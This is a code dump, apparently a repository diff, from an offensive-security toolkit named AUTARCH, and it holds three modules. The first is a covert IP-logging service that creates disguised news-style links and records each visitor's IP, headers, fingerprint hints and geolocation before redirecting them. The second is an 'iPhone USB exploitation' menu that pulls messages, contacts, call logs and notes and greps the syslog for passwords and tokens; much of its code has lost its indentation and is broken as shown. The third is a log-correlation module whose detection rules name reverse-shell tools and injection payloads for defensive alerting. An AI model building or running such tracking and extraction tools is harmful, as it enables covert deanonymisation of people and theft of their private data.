        with open(self._file, 'w') as f:
            json.dump(self._links, f, indent=2)

    def create_link(self, target_url: str, name: str = '',
                    disguise: str = 'article') -> dict:
        """Create a new capture link.

        Args:
            target_url: The legitimate URL to redirect to after capture.
            name: Friendly name for this link.
            disguise: URL style — 'article' for a realistic news path;
                anything else falls back to the short '/c/<key>' form.

        Returns:
            Dict with key, paths, and the redirect target.
        """
        key = _generate_short_key()
        if disguise == 'article':
            article_path = _generate_article_path()
        else:
            article_path = f'/c/{key}'
        with self._lock:
            self._links[key] = {
                'key': key,
                'name': name or f'Link {key}',
                'target_url': target_url,
                'disguise': disguise,
                'article_path': article_path,
                'short_path': f'/c/{key}',
                'created': datetime.now().isoformat(),
                'captures': [],
                'active': True,
            }
            self._save()
        return {
            'ok': True,
            'key': key,
            'short_path': f'/c/{key}',
            'article_path': article_path,
            'target_url': target_url,
        }

    def get_link(self, key: str) -> Optional[dict]:
        """Return the link record for *key*, or None when unknown."""
        return self._links.get(key)

    def list_links(self) -> List[dict]:
        """Return all link records as a list."""
        return list(self._links.values())

    def delete_link(self, key: str) -> bool:
        """Delete a link and its captures; True if it existed."""
        with self._lock:
            if key in self._links:
                del self._links[key]
                self._save()
                return True
            return False

    def find_by_path(self, path: str) -> Optional[dict]:
        """Find a link by its article path (linear scan; link count is small)."""
        for link in self._links.values():
            if link.get('article_path') == path:
                return link
        return None

    def record_capture(self, key: str, ip: str, user_agent: str = '',
                       accept_language: str = '', referer: str = '',
                       headers: Optional[dict] = None) -> bool:
        """Record a visitor capture.

        Returns False when the key is unknown or the link is disabled.

        NOTE: the lock is held across the best-effort GeoIP HTTP call,
        so concurrent captures serialize; acceptable at OSINT volumes.
        """
        with self._lock:
            link = self._links.get(key)
            if not link or not link.get('active'):
                return False
            capture = {
                'ip': ip,
                'timestamp': datetime.now().isoformat(),
                'user_agent': user_agent,
                'accept_language': accept_language,
                'referer': referer,
            }
            if headers:
                # Proxy/CDN headers may carry the real client address.
                for h in ['X-Forwarded-For', 'CF-Connecting-IP', 'X-Real-IP']:
                    val = headers.get(h, '')
                    if val:
                        capture[f'header_{h.lower().replace("-","_")}'] = val
                # Client hints give coarse browser/platform fingerprints.
                for h in ['Sec-CH-UA', 'Sec-CH-UA-Platform', 'Sec-CH-UA-Mobile',
                          'DNT', 'Upgrade-Insecure-Requests']:
                    val = headers.get(h, '')
                    if val:
                        capture[f'hint_{h.lower().replace("-","_")}'] = val
            # GeoIP lookup (best-effort; a failure never drops the capture)
            try:
                geo = self._geoip_lookup(ip)
                if geo:
                    capture['geo'] = geo
            except Exception:
                pass
            link['captures'].append(capture)
            self._save()
            return True

    def _geoip_lookup(self, ip: str) -> Optional[dict]:
        """Best-effort GeoIP lookup using the existing geoip module.

        Bug fix: GeoIPLookup.lookup() returns a flat result dict (or
        {'error': ...}) — it never sets a 'success' key, so the old
        `result.get('success')` test always failed and geo data was
        silently dropped from every capture. Treat "no error key" as
        success instead.
        """
        try:
            from modules.geoip import GeoIPLookup
            geo = GeoIPLookup()
            result = geo.lookup(ip)
            if result and not result.get('error'):
                return {
                    'country': result.get('country', ''),
                    'region': result.get('region', ''),
                    'city': result.get('city', ''),
                    'isp': result.get('isp', ''),
                    'lat': result.get('latitude', ''),
                    'lon': result.get('longitude', ''),
                }
        except Exception:
            pass
        return None

    def get_captures(self, key: str) -> List[dict]:
        """Return the capture list for a link ([] when unknown)."""
        link = self._links.get(key)
        return link.get('captures', []) if link else []

    def get_stats(self, key: str) -> dict:
        """Summarize captures: total, unique IPs, first/last timestamps."""
        link = self._links.get(key)
        if not link:
            return {}
        captures = link.get('captures', [])
        unique_ips = set(c['ip'] for c in captures)
        return {
            'total': len(captures),
            'unique_ips': len(unique_ips),
            'first': captures[0]['timestamp'] if captures else None,
            'last': captures[-1]['timestamp'] if captures else None,
        }

    def export_captures(self, key: str, fmt: str = 'json') -> str:
        """Export captures to a JSON or CSV string.

        Bug fix: CSV output now uses the csv module so commas/quotes in
        fields (user agents, city names) are escaped correctly — the
        previous hand-rolled join produced malformed rows for such values.
        """
        captures = self.get_captures(key)
        if fmt == 'csv':
            import csv
            import io
            buf = io.StringIO()
            writer = csv.writer(buf, lineterminator='\n')
            writer.writerow(['ip', 'timestamp', 'user_agent', 'country', 'city'])
            for c in captures:
                geo = c.get('geo', {})
                writer.writerow([
                    c.get('ip', ''),
                    c.get('timestamp', ''),
                    c.get('user_agent', ''),
                    geo.get('country', ''),
                    geo.get('city', ''),
                ])
            return buf.getvalue()
        return json.dumps(captures, indent=2)
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None            # process-wide IPCaptureService singleton
_lock = threading.Lock()    # guards first construction only
def get_ip_capture() -> IPCaptureService:
    """Return the shared IPCaptureService (double-checked locking)."""
    global _instance
    if _instance is None:
        with _lock:
            # Re-check inside the lock: another thread may have won the race.
            if _instance is None:
                _instance = IPCaptureService()
    return _instance
# ── Interactive CLI ──────────────────────────────────────────────────────────
def run():
    """Interactive CLI for IP Capture & Redirect.

    Shows summary stats, then dispatches to the _cli_* helpers until
    the user selects 0.
    """
    service = get_ip_capture()
    while True:
        print("\n" + "=" * 60)
        print(" IP CAPTURE & REDIRECT")
        print(" Stealthy link tracking for OSINT")
        print("=" * 60)
        # Summary line: active link count and total hits across links.
        links = service.list_links()
        active = sum(1 for l in links if l.get('active'))
        total_captures = sum(len(l.get('captures', [])) for l in links)
        print(f" Active links: {active} | Total captures: {total_captures}")
        print()
        print(" 1 — Create Capture Link")
        print(" 2 — List Active Links")
        print(" 3 — View Captures")
        print(" 4 — Delete Link")
        print(" 5 — Export Captures")
        print(" 0 — Back")
        print()
        choice = input(" Select: ").strip()
        if choice == '0':
            break
        elif choice == '1':
            _cli_create(service)
        elif choice == '2':
            _cli_list(service)
        elif choice == '3':
            _cli_view(service)
        elif choice == '4':
            _cli_delete(service)
        elif choice == '5':
            _cli_export(service)
def _cli_create(service: IPCaptureService):
    """Create a new capture link.

    Prompts for the redirect target, a friendly name, and the disguise
    style, then prints the generated paths (the operator prepends the
    public host themselves).
    """
    print("\n--- Create Capture Link ---")
    target = input(" Target URL (redirect destination): ").strip()
    if not target:
        print(" [!] URL required")
        return
    # Default to HTTPS when the operator omits the scheme.
    if not target.startswith(('http://', 'https://')):
        target = 'https://' + target
    name = input(" Friendly name []: ").strip()
    print(" Disguise type:")
    print(" 1 — Article URL (realistic path)")
    print(" 2 — Short URL (/c/xxxxx)")
    dtype = input(" Select [1]: ").strip() or '1'
    disguise = 'article' if dtype == '1' else 'short'
    result = service.create_link(target, name, disguise)
    if result['ok']:
        print(f"\n [+] Link created!")
        print(f" Key: {result['key']}")
        print(f" Short URL: <your-host>{result['short_path']}")
        print(f" Article URL: <your-host>{result['article_path']}")
        print(f" Redirects to: {result['target_url']}")
    else:
        # create_link currently always returns ok=True; defensive branch.
        print(f" [-] {result.get('error', 'Failed')}")
def _cli_list(service: IPCaptureService):
    """List all links with their paths and per-link capture stats."""
    links = service.list_links()
    if not links:
        print("\n No capture links")
        return
    print(f"\n--- Active Links ({len(links)}) ---")
    for l in links:
        stats = service.get_stats(l['key'])
        active = "ACTIVE" if l.get('active') else "DISABLED"
        print(f"\n [{l['key']}] {l.get('name', 'Unnamed')}{active}")
        print(f" Target: {l['target_url']}")
        print(f" Short: {l['short_path']}")
        print(f" Article: {l.get('article_path', 'N/A')}")
        print(f" Captures: {stats.get('total', 0)} ({stats.get('unique_ips', 0)} unique)")
        # Only show a last-hit line when at least one capture exists.
        if stats.get('last'):
            print(f" Last hit: {stats['last']}")
def _cli_view(service: IPCaptureService):
    """View captures for a link: one line per hit plus truncated UA."""
    key = input(" Link key: ").strip()
    captures = service.get_captures(key)
    if not captures:
        print(" No captures for this link")
        return
    print(f"\n--- Captures ({len(captures)}) ---")
    for c in captures:
        geo = c.get('geo', {})
        location = f"{geo.get('city', '?')}, {geo.get('country', '?')}" if geo else 'Unknown'
        print(f" {c['timestamp']} {c['ip']:>15} {location}")
        if c.get('user_agent'):
            # Truncate long user agents so each capture stays readable.
            ua = c['user_agent'][:80] + ('...' if len(c.get('user_agent', '')) > 80 else '')
            print(f" UA: {ua}")
def _cli_delete(service: IPCaptureService):
    """Prompt for a link key and remove that link from the service."""
    key = input(" Link key to delete: ").strip()
    outcome = " [+] Link deleted" if service.delete_link(key) else " [-] Link not found"
    print(outcome)
def _cli_export(service: IPCaptureService):
    """Export captures for a link; optionally save under data/exports/."""
    key = input(" Link key: ").strip()
    fmt = input(" Format (json/csv) [json]: ").strip() or 'json'
    data = service.export_captures(key, fmt)
    print(f"\n{data}")
    save = input("\n Save to file? [y/N]: ").strip().lower()
    if save == 'y':
        # Any format other than 'csv' is exported as JSON.
        ext = 'csv' if fmt == 'csv' else 'json'
        filepath = os.path.join(get_data_dir(), 'exports', f'captures_{key}.{ext}')
        os.makedirs(os.path.dirname(filepath), exist_ok=True)
        with open(filepath, 'w') as f:
            f.write(data)
        print(f" [+] Saved to {filepath}")

402
modules/iphone_local.py Normal file
View File

@@ -0,0 +1,402 @@
"""
iPhone Local USB - Device access via libimobiledevice
"""
DESCRIPTION = "iPhone USB exploitation (info, backup, extract, apps, profiles)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "hardware"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class IPhoneLocal:
"""Interactive menu for iPhone USB device access."""
    def __init__(self):
        # Lazy import: core.iphone_exploit wraps the libimobiledevice tools.
        from core.iphone_exploit import get_iphone_manager
        self.mgr = get_iphone_manager()
        self.udid = None  # UDID of the currently selected device (None = none)
    def _select_device(self):
        """Pick a connected iOS device and store its UDID in self.udid.

        Auto-selects when exactly one device is attached; otherwise
        prompts. Leaves self.udid unchanged on bad or aborted input.
        """
        devices = self.mgr.list_devices()
        if not devices:
            print(" No iOS devices connected.")
            return
        if len(devices) == 1:
            self.udid = devices[0]['udid']
            print(f" Selected: {devices[0].get('name','')} ({self.udid[:12]}...)")
            return
        print("\n Select device:")
        for i, d in enumerate(devices, 1):
            print(f" {i}) {d.get('name','')} - {d.get('model','')} iOS {d.get('ios_version','')} [{d['udid'][:12]}...]")
        try:
            choice = int(input(" > ").strip())
            if 1 <= choice <= len(devices):
                self.udid = devices[choice - 1]['udid']
        except (ValueError, EOFError, KeyboardInterrupt):
            pass
def _ensure_device(self):
if not self.udid:
self._select_device()
return self.udid is not None
def show_menu(self):
status = self.mgr.get_status()
print(f"\n{'='*60}")
print(" iPhone USB Exploitation")
print(f"{'='*60}")
print(f" Tools: {status['found']}/{status['total']} available")
print(f" Device: {self.udid[:16] + '...' if self.udid else '(none)'}")
print()
print(" ── Device ──")
print(" [1] List Devices")
print(" [2] Device Info")
print(" [3] Full Fingerprint")
print(" [4] Pair / Validate")
print(" [5] Get/Set Device Name")
print(" [6] Restart / Shutdown / Sleep")
print()
print(" ── Capture ──")
print(" [10] Screenshot")
print(" [11] Syslog Dump")
print(" [12] Syslog Grep (sensitive)")
print(" [13] Crash Reports")
print()
print(" ── Apps ──")
print(" [20] List Apps")
print(" [21] Install IPA")
print(" [22] Uninstall App")
print()
print(" ── Backup & Extraction ──")
print(" [30] Create Backup")
print(" [31] List Backups")
print(" [32] Extract SMS/iMessage")
print(" [33] Extract Contacts")
print(" [34] Extract Call Log")
print(" [35] Extract Notes")
print(" [36] Browse Backup Files")
print(" [37] Extract Backup File")
print()
print(" ── Filesystem & Profiles ──")
print(" [40] Mount Filesystem (ifuse)")
print(" [41] Mount App Documents")
print(" [42] Unmount")
print(" [43] List Profiles")
print(" [44] Install Profile")
print(" [45] Remove Profile")
print()
print(" ── Network ──")
print(" [50] Port Forward (iproxy)")
print(" [51] Export Recon Report")
print()
print(" [s] Select Device")
print(" [0] Back")
print()
def _pick_backup(self):
backups = self.mgr.list_backups()
if not backups['backups']:
print(" No backups found. Create one first.")
return None
print("\n Available backups:")
for i, b in enumerate(backups['backups'], 1):
name = b.get('device_name', b['udid'][:12])
size = b.get('size_mb', 0)
print(f" {i}) {name} - {b.get('ios_version','')} ({size:.0f} MB)")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(backups['backups']):
return backups['backups'][choice - 1]['path']
except (ValueError, EOFError, KeyboardInterrupt):
pass
return None
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
elif choice == 's':
self._select_device()
continue
try:
self._dispatch(choice)
except (EOFError, KeyboardInterrupt):
continue
def _dispatch(self, choice):
m = self.mgr
# Device
if choice == '1':
devices = m.list_devices()
if not devices:
print(" No iOS devices connected.")
else:
print(f"\n {'UDID':<42} {'Name':<20} {'Model':<15} iOS")
print(f" {'-'*85}")
for d in devices:
print(f" {d['udid']:<42} {d.get('name',''):<20} {d.get('model',''):<15} {d.get('ios_version','')}")
elif choice == '2':
if not self._ensure_device(): return
info = m.device_info(self.udid)
if 'error' in info:
print(f" Error: {info['error']}")
else:
for k, v in list(info.items())[:40]:
print(f" {k:<35} {v}")
if len(info) > 40:
print(f" ... and {len(info)-40} more fields")
elif choice == '3':
if not self._ensure_device(): return
fp = m.full_fingerprint(self.udid)
for k, v in list(fp.items())[:50]:
if isinstance(v, dict):
print(f" {k}:")
for sk, sv in list(v.items())[:10]:
print(f" {sk}: {sv}")
else:
print(f" {k:<35} {v}")
elif choice == '4':
if not self._ensure_device(): return
action = input(" [p]air / [v]alidate / [u]npair? ").strip().lower()
if action == 'p':
r = m.pair_device(self.udid)
elif action == 'u':
r = m.unpair_device(self.udid)
else:
r = m.validate_pair(self.udid)
print(f" {r.get('output', r)}")
elif choice == '5':
if not self._ensure_device(): return
r = m.get_name(self.udid)
print(f" Current name: {r['name']}")
new = input(" New name (Enter to keep): ").strip()
if new:
m.set_name(self.udid, new)
print(f" Name set to: {new}")
elif choice == '6':
if not self._ensure_device(): return
action = input(" [r]estart / [s]hutdown / s[l]eep? ").strip().lower()
if action == 'r':
r = m.restart_device(self.udid)
elif action == 's':
r = m.shutdown_device(self.udid)
elif action == 'l':
r = m.sleep_device(self.udid)
else:
print(" Invalid."); return
print(f" {r.get('output', 'Done')}")
# Capture
elif choice == '10':
if not self._ensure_device(): return
r = m.screenshot(self.udid)
if r['success']:
print(f" Screenshot: {r['path']} ({r['size']} bytes)")
else:
print(f" Error: {r['error']}")
elif choice == '11':
if not self._ensure_device(): return
dur = input(" Duration [5]: ").strip()
r = m.syslog_dump(self.udid, duration=int(dur) if dur else 5)
if r['success']:
print(f" Syslog: {r['path']} ({r['lines']} lines)")
else:
print(f" Error: {r['error']}")
elif choice == '12':
if not self._ensure_device(): return
pattern = input(" Grep pattern [password|token|key]: ").strip() or 'password|token|key|secret'
dur = input(" Duration [5]: ").strip()
r = m.syslog_grep(self.udid, pattern, duration=int(dur) if dur else 5)
print(f" {r['count']} matches:")
for line in r.get('matches', [])[:20]:
print(f" {line[:120]}")
elif choice == '13':
if not self._ensure_device(): return
r = m.crash_reports(self.udid)
if r['success']:
print(f" {r['count']} crash reports in {r['output_dir']}")
else:
print(f" Error: {r['error']}")
# Apps
elif choice == '20':
if not self._ensure_device(): return
t = input(" Type [user/system/all]: ").strip() or 'user'
r = m.list_apps(self.udid, app_type=t)
if r['success']:
print(f" {r['count']} apps:")
for a in r['apps']:
print(f" {a.get('bundle_id',''):<40} {a.get('name','')}")
else:
print(f" Error: {r['error']}")
elif choice == '21':
if not self._ensure_device(): return
path = input(" IPA path: ").strip()
if path:
r = m.install_app(self.udid, path)
print(f" {r.get('output', 'Done')}")
elif choice == '22':
if not self._ensure_device(): return
bid = input(" Bundle ID to remove: ").strip()
if bid:
r = m.uninstall_app(self.udid, bid)
print(f" {r.get('output', 'Done')}")
# Backup
elif choice == '30':
if not self._ensure_device(): return
enc = input(" Encrypted backup? [y/N]: ").strip().lower() == 'y'
pwd = ''
if enc:
pwd = input(" Backup password: ").strip()
print(" Creating backup (this may take several minutes)...")
r = m.create_backup(self.udid, encrypted=enc, password=pwd)
if r['success']:
print(f" Backup saved: {r['backup_path']}")
else:
print(f" Error: {r.get('output', 'Failed')}")
elif choice == '31':
r = m.list_backups()
print(f" {r['count']} backups:")
for b in r['backups']:
name = b.get('device_name', b['udid'][:12])
print(f" {name} - iOS {b.get('ios_version','')} - {b.get('size_mb',0):.0f}MB - {b.get('date','')}")
elif choice == '32':
bp = self._pick_backup()
if bp:
r = m.extract_backup_sms(bp)
if r['success']:
print(f" {r['count']} messages:")
for msg in r['messages'][:20]:
d = 'ME' if msg['is_from_me'] else msg['handle']
print(f" [{msg['date']}] {d}: {msg['text'][:60]}")
else:
print(f" Error: {r['error']}")
elif choice == '33':
bp = self._pick_backup()
if bp:
r = m.extract_backup_contacts(bp)
if r['success']:
print(f" {r['count']} contacts:")
for c in r['contacts'][:30]:
print(f" {c['first']} {c['last']} {c.get('organization','')} - {', '.join(c['values'][:3])}")
else:
print(f" Error: {r['error']}")
elif choice == '34':
bp = self._pick_backup()
if bp:
r = m.extract_backup_call_log(bp)
if r['success']:
print(f" {r['count']} calls:")
for c in r['calls'][:20]:
print(f" [{c['date']}] {c['type']:<10} {c['address']} ({c['duration']}s)")
else:
print(f" Error: {r['error']}")
elif choice == '35':
bp = self._pick_backup()
if bp:
r = m.extract_backup_notes(bp)
if r['success']:
print(f" {r['count']} notes:")
for n in r['notes'][:15]:
print(f" [{n['date']}] {n['title']}")
if n['body']:
print(f" {n['body'][:80]}")
else:
print(f" Error: {r['error']}")
elif choice == '36':
bp = self._pick_backup()
if bp:
domain = input(" Domain filter (or Enter): ").strip()
path_f = input(" Path filter (or Enter): ").strip()
r = m.list_backup_files(bp, domain=domain, path_filter=path_f)
if r['success']:
print(f" {r['count']} files:")
for f in r['files'][:30]:
print(f" [{f['domain']}] {f['path']}")
else:
print(f" Error: {r['error']}")
elif choice == '37':
bp = self._pick_backup()
if bp:
fhash = input(" File hash: ").strip()
name = input(" Output filename (or Enter): ").strip() or None
if fhash:
r = m.extract_backup_file(bp, fhash, output_name=name)
if r['success']:
print(f" Extracted: {r['path']} ({r['size']} bytes)")
else:
print(f" Error: {r['error']}")
# Filesystem
elif choice == '40':
if not self._ensure_device(): return
r = m.mount_filesystem(self.udid)
if r['success']:
print(f" Mounted at: {r['mountpoint']}")
else:
print(f" Error: {r.get('error', r.get('output'))}")
elif choice == '41':
if not self._ensure_device(): return
bid = input(" Bundle ID: ").strip()
if bid:
r = m.mount_app_documents(self.udid, bid)
if r['success']:
print(f" Mounted at: {r['mountpoint']}")
else:
print(f" Error: {r.get('error', r.get('output'))}")
elif choice == '42':
mp = input(" Mountpoint to unmount: ").strip()
if mp:
m.unmount_filesystem(mp)
print(" Unmounted.")
elif choice == '43':
if not self._ensure_device(): return
r = m.list_profiles(self.udid)
if r['success']:
print(f" {r['count']} profiles:")
for p in r['profiles']:
print(f" {p.get('id','')} - {p.get('name','')}")
else:
print(f" Error: {r['error']}")
elif choice == '44':
if not self._ensure_device(): return
path = input(" Profile path (.mobileprovision/.mobileconfig): ").strip()
if path:
r = m.install_profile(self.udid, path)
print(f" {r.get('output', 'Done')}")
elif choice == '45':
if not self._ensure_device(): return
pid = input(" Profile ID to remove: ").strip()
if pid:
r = m.remove_profile(self.udid, pid)
print(f" {r.get('output', 'Done')}")
# Network
elif choice == '50':
if not self._ensure_device(): return
lp = input(" Local port: ").strip()
dp = input(" Device port: ").strip()
if lp and dp:
r = m.port_forward(self.udid, int(lp), int(dp))
if r['success']:
print(f" Forwarding localhost:{lp} -> device:{dp} (PID: {r['pid']})")
else:
print(f" Error: {r['error']}")
elif choice == '51':
if not self._ensure_device(): return
r = m.export_recon_report(self.udid)
if r['success']:
print(f" Report: {r['report_path']}")
else:
print(" Invalid choice.")
def run():
    """Module entry point: launch the interactive iPhone USB menu."""
    IPhoneLocal().run_interactive()

1447
modules/llm_trainer.py Normal file

File diff suppressed because it is too large Load Diff

1097
modules/loadtest.py Normal file

File diff suppressed because it is too large Load Diff

551
modules/log_correlator.py Normal file
View File

@@ -0,0 +1,551 @@
"""AUTARCH Log Correlator
Syslog ingestion, pattern matching, anomaly detection, alert rules,
timeline correlation, and mini-SIEM functionality.
"""
DESCRIPTION = "Log correlation & anomaly detection (mini-SIEM)"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "defense"
import os
import re
import json
import time
import threading
from pathlib import Path
from datetime import datetime, timezone
from collections import Counter, defaultdict
from typing import Dict, List, Optional, Any
try:
    from core.paths import get_data_dir
except ImportError:
    # Stand-alone fallback when AUTARCH's core package is not importable:
    # use a ./data directory next to the modules/ folder.
    def get_data_dir():
        """Return the default data directory path as a string."""
        return str(Path(__file__).parent.parent / 'data')
# ── Built-in Detection Rules ────────────────────────────────────────────────
DEFAULT_RULES = [
    # Rule schema: `pattern` is a regex matched case-insensitively against
    # each log line by LogCorrelator._check_rules. When `threshold` > 1 and
    # `window_seconds` > 0, the rule only alerts after `threshold` matches
    # within the window; otherwise every match alerts immediately.
    {
        'id': 'brute_force_ssh',
        'name': 'SSH Brute Force',
        'pattern': r'(Failed password|authentication failure).*ssh',
        'severity': 'high',
        'threshold': 5,
        'window_seconds': 60,
        'description': 'Multiple failed SSH login attempts'
    },
    {
        'id': 'brute_force_web',
        'name': 'Web Login Brute Force',
        'pattern': r'(401|403).*POST.*(login|auth|signin)',
        'severity': 'high',
        'threshold': 10,
        'window_seconds': 60,
        'description': 'Multiple failed web login attempts'
    },
    {
        'id': 'sql_injection',
        'name': 'SQL Injection Attempt',
        'pattern': r"(UNION\s+SELECT|OR\s+1\s*=\s*1|DROP\s+TABLE|'--|\bSLEEP\()",
        'severity': 'critical',
        'threshold': 1,
        'window_seconds': 0,
        'description': 'SQL injection pattern detected'
    },
    {
        'id': 'xss_attempt',
        'name': 'XSS Attempt',
        'pattern': r'(<script|javascript:|onerror=|onload=|<svg\s+onload)',
        'severity': 'high',
        'threshold': 1,
        'window_seconds': 0,
        'description': 'Cross-site scripting pattern detected'
    },
    {
        'id': 'path_traversal',
        'name': 'Path Traversal',
        'pattern': r'(\.\./|\.\.\\|%2e%2e)',
        'severity': 'high',
        'threshold': 1,
        'window_seconds': 0,
        'description': 'Directory traversal attempt'
    },
    {
        'id': 'priv_escalation',
        'name': 'Privilege Escalation',
        'pattern': r'(sudo|su\s+-|pkexec|gpasswd|usermod.*-G.*sudo)',
        'severity': 'medium',
        'threshold': 3,
        'window_seconds': 300,
        'description': 'Multiple privilege escalation attempts'
    },
    {
        'id': 'port_scan',
        'name': 'Port Scan Detected',
        'pattern': r'(connection refused|reset by peer|SYN_RECV)',
        'severity': 'medium',
        'threshold': 20,
        'window_seconds': 10,
        'description': 'Rapid connection attempts indicate scanning'
    },
    {
        'id': 'suspicious_download',
        'name': 'Suspicious Download',
        'pattern': r'(wget|curl|python.*http|nc\s+-e)',
        'severity': 'medium',
        'threshold': 1,
        'window_seconds': 0,
        'description': 'Potential malicious download or reverse shell'
    },
    {
        'id': 'service_crash',
        'name': 'Service Crash',
        'pattern': r'(segfault|core dumped|out of memory|killed process)',
        'severity': 'high',
        'threshold': 1,
        'window_seconds': 0,
        'description': 'Service crash or OOM event'
    },
    {
        'id': 'root_login',
        'name': 'Root Login',
        'pattern': r'(session opened.*root|Accepted.*root|su.*root)',
        'severity': 'medium',
        'threshold': 1,
        'window_seconds': 0,
        'description': 'Root/admin login detected'
    },
]
# ── Log Parser ───────────────────────────────────────────────────────────────
class LogParser:
    """Multi-format log parser.

    Recognizes JSON-structured logs, BSD syslog lines, and Apache/Nginx
    access logs (Common Log Format prefix), falling back to a generic
    'unknown' record for anything else.
    """
    # "Mon DD HH:MM:SS host program[pid]: message" (pid optional)
    SYSLOG_RE = re.compile(
        r'^(\w{3}\s+\d+\s+\d{2}:\d{2}:\d{2})\s+(\S+)\s+(\S+?)(?:\[(\d+)\])?:\s*(.*)'
    )
    # 'client ident user [timestamp] "METHOD /path PROTO" status size'.
    # Per Common Log Format, size is "-" when the response carried no body,
    # so the last group accepts either digits or a literal dash.
    APACHE_RE = re.compile(
        r'^(\S+)\s+\S+\s+\S+\s+\[([^\]]+)\]\s+"(\S+)\s+(\S+)\s+\S+"\s+(\d+)\s+(\d+|-)'
    )
    # Cheap structural test for a JSON object on a single line.
    JSON_LOG_RE = re.compile(r'^\{.*\}$')
    @staticmethod
    def parse_line(line: str) -> Optional[Dict]:
        """Parse a single log line into a normalized dict.

        Returns None for blank lines. The returned dict always carries
        'format' and 'raw'; other keys depend on the detected format.
        """
        line = line.strip()
        if not line:
            return None
        # Try JSON format first — common field names are probed in order.
        if LogParser.JSON_LOG_RE.match(line):
            try:
                data = json.loads(line)
                return {
                    'format': 'json',
                    'timestamp': data.get('timestamp', data.get('time', data.get('@timestamp', ''))),
                    'source': data.get('source', data.get('host', '')),
                    'program': data.get('program', data.get('service', data.get('logger', ''))),
                    'message': data.get('message', data.get('msg', str(data))),
                    'level': data.get('level', data.get('severity', 'info')),
                    'raw': line
                }
            except json.JSONDecodeError:
                # Looked like JSON but wasn't — fall through to other formats.
                pass
        # Try syslog format
        m = LogParser.SYSLOG_RE.match(line)
        if m:
            return {
                'format': 'syslog',
                'timestamp': m.group(1),
                'source': m.group(2),
                'program': m.group(3),
                'pid': m.group(4),
                'message': m.group(5),
                'raw': line
            }
        # Try Apache/Nginx format
        m = LogParser.APACHE_RE.match(line)
        if m:
            return {
                'format': 'apache',
                'timestamp': m.group(2),
                'source': m.group(1),
                'method': m.group(3),
                'path': m.group(4),
                'status': int(m.group(5)),
                # "-" (no response body) normalizes to 0 bytes.
                'size': 0 if m.group(6) == '-' else int(m.group(6)),
                'message': line,
                'raw': line
            }
        # Generic fallback
        return {
            'format': 'unknown',
            'timestamp': '',
            'message': line,
            'raw': line
        }
# ── Log Correlator Engine ────────────────────────────────────────────────────
class LogCorrelator:
    """Log correlation and anomaly detection engine.

    Holds parsed log entries in memory; alerts and custom rules are
    persisted as JSON under <data_dir>/log_correlator.
    """
    def __init__(self):
        """Create the data directory, then load custom rules and saved alerts."""
        self.data_dir = os.path.join(get_data_dir(), 'log_correlator')
        os.makedirs(self.data_dir, exist_ok=True)
        self.rules: List[Dict] = list(DEFAULT_RULES)  # built-ins + custom rules
        self.alerts: List[Dict] = []        # generated alerts (persisted)
        self.logs: List[Dict] = []          # parsed entries (in-memory only)
        self.sources: Dict[str, Dict] = {}  # metadata per ingested source
        # Per-rule match timestamps used for threshold/window evaluation.
        self._rule_hits: Dict[str, List[float]] = defaultdict(list)
        self._lock = threading.Lock()  # guards _rule_hits
        self._load_custom_rules()
        self._load_alerts()
    def _load_custom_rules(self):
        """Append user-defined rules from custom_rules.json, if present."""
        rules_file = os.path.join(self.data_dir, 'custom_rules.json')
        if os.path.exists(rules_file):
            try:
                with open(rules_file) as f:
                    custom = json.load(f)
                self.rules.extend(custom)
            except Exception:
                # Corrupt/unreadable rules file: keep the built-ins only.
                pass
    def _save_custom_rules(self):
        """Persist user-defined rules (built-ins are never written out)."""
        # Only save non-default rules
        default_ids = {r['id'] for r in DEFAULT_RULES}
        custom = [r for r in self.rules if r['id'] not in default_ids]
        rules_file = os.path.join(self.data_dir, 'custom_rules.json')
        with open(rules_file, 'w') as f:
            json.dump(custom, f, indent=2)
    def _load_alerts(self):
        """Restore previously persisted alerts, if any."""
        alerts_file = os.path.join(self.data_dir, 'alerts.json')
        if os.path.exists(alerts_file):
            try:
                with open(alerts_file) as f:
                    self.alerts = json.load(f)
            except Exception:
                pass
    def _save_alerts(self):
        """Persist alerts to disk, keeping only the most recent 1000."""
        alerts_file = os.path.join(self.data_dir, 'alerts.json')
        with open(alerts_file, 'w') as f:
            json.dump(self.alerts[-1000:], f, indent=2)
    # ── Log Ingestion ────────────────────────────────────────────────────
    def ingest_file(self, filepath: str, source_name: Optional[str] = None) -> Dict:
        """Ingest log file for analysis.

        Parses every line, runs detection rules on each entry, and records
        the file under `source_name` (defaults to the file's basename).
        Returns an ok/error dict with parse and alert counts.
        """
        if not os.path.exists(filepath):
            return {'ok': False, 'error': 'File not found'}
        source = source_name or Path(filepath).name
        parsed = 0
        alerts_generated = 0
        try:
            with open(filepath, 'r', errors='ignore') as f:
                for line in f:
                    entry = LogParser.parse_line(line)
                    if entry:
                        entry['source_file'] = source
                        self.logs.append(entry)
                        parsed += 1
                        # Run detection rules
                        new_alerts = self._check_rules(entry)
                        alerts_generated += len(new_alerts)
            self.sources[source] = {
                'file': filepath,
                'lines': parsed,
                'ingested': datetime.now(timezone.utc).isoformat()
            }
            if alerts_generated:
                self._save_alerts()
            return {
                'ok': True, 'source': source,
                'lines_parsed': parsed,
                'alerts_generated': alerts_generated
            }
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    def ingest_text(self, text: str, source_name: str = 'paste') -> Dict:
        """Ingest log text directly (same pipeline as ingest_file)."""
        parsed = 0
        alerts_generated = 0
        for line in text.strip().splitlines():
            entry = LogParser.parse_line(line)
            if entry:
                entry['source_file'] = source_name
                self.logs.append(entry)
                parsed += 1
                new_alerts = self._check_rules(entry)
                alerts_generated += len(new_alerts)
        if alerts_generated:
            self._save_alerts()
        return {
            'ok': True, 'source': source_name,
            'lines_parsed': parsed,
            'alerts_generated': alerts_generated
        }
    # ── Detection ────────────────────────────────────────────────────────
    def _check_rules(self, entry: Dict) -> List[Dict]:
        """Check log entry against detection rules.

        Returns the alerts generated for this entry. Patterns are matched
        case-insensitively against message + raw text. For threshold rules,
        no alert fires until `threshold` hits occur within `window_seconds`;
        once reached, each further hit inside the window also alerts.
        """
        new_alerts = []
        message = entry.get('message', '') + ' ' + entry.get('raw', '')
        now = time.time()
        for rule in self.rules:
            try:
                if re.search(rule['pattern'], message, re.I):
